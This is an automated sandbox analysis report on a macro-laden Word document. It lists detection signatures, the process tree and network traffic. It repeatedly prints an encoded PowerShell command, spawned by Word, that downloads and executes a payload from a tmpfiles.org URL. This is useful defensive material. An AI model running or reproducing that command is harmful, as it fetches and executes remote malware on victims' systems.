Edit tour

Windows Analysis Report
test.doc.bin.doc

Overview

General Information

Sample name:	test.doc.bin.doc
Analysis ID:	1583048
MD5:	0c9f45c5f7ca6b930e912005bdc28e35
SHA1:	e064b2221df8bbb82c17da0d06e8282c513d2eb4
SHA256:	095a8d9dcce2ce35502bfa33f28ac47307c2a2f399b715624f2efae80e8ca520
Tags:	docuser-JaffaCakes118
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Powershell download and execute

Document exploit detected (process start blacklist hit)

Encrypted powershell cmdline option found

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process queries suspicious COM object (likely to drop second stage)

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Contains long sleeps (>= 3 min)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Execution of Powershell with Base64

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 2148 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

powershell.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 6980	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_6980.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2148, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 6980, ProcessName: powershell.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2148, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 6980, ProcessName: powershell.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2148, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 6980, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2148, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 6980, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2148, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 6980, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: test.doc.bin.doc	Virustotal: Detection: 50%			Perma Link
Source: test.doc.bin.doc	ReversingLabs: Detection: 34%

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\~WRD0000.tmp

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: test.doc.bin.doc

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49712 version: TLS 1.2

Source:

Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.2130140644.0000000002761000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

DNS query: name: tmpfiles.org

Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443

Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443

Source: global traffic

HTTP traffic detected: GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.21.21.16 104.21.21.16

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: tmpfiles.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jan 2025 16:10:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6Im1La2dValR6SjVXcFhYdVVzOTNoR0E9PSIsInZhbHVlIjoibnpycEpIZXVSTWFJaUh5OWlaSFNVWU9ONjQreTFDYU1FSXR2Rk5lTmlWWHlzYkJ0UUdyRGwzcTRUQ2dpMlU0Tmo5VjBGWGNUWGo0Z2FGMVhUSGJySGZLdjdpRnJ1QXVCSzFHU0o5Uk95VlZWeitkT2tJWG1sWW9uWjlLRVZ0T24iLCJtYWMiOiJlOWM0OGIzNWZkZDU0ZDhlZDIyMWI2OTM0YTExZDJlMGE1NWI1Y2VkYzNkMGMzMGM1ZDJiNWNiZDkyZjYzMGJlIn0%3D; expires=Wed, 01-Jan-2025 18:10:10 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6IkVRUnlqa3B1SnE4dko3N0djK2RCcUE9PSIsInZhbHVlIjoiUlR1endod1QrMHQ5dUx3U3lsbnBOdGJyZFo3SFUvWEh1bGVzNG9KY1R1Szh1NnlOQVpSS3Bmek5HcW1aL1VITWlLa0dPd3NWUDYwVnFqRUk0UGhOdmc4dStjOXFmdC9Wd0VVdFJ0Q1F2bmh3UjUySHBvNDRlM3B0cVEzSHFLWTkiLCJtYWMiOiJlZTFhZjJhYjZhNzkwYzNhYzExZjc0ZTQzOTk4YjU4ODk3NDcwNDI1MzI1NDcxMTY4MDQ0NGViZmExMzRkNmVlIn0%3D; expires=Wed, 01-Jan-2025 18:10:10 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VXUeAVq%2FVAOf%2Bqp6zRxzZxVXFGMNFF%2BBW46GDcZw6DcH%2FCuLQTsdok4FEW8MZ%2Fi1ZASqX10eacEUL4JUqYLcx95C%2BRh99BKKEPGQ21ettWkMiEvDRzCVjOfxkMYSm6A%3D"}],"group":"cf-nel","max_age":604800}

Source: powershell.exe, 00000007.00000002.2130901589.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
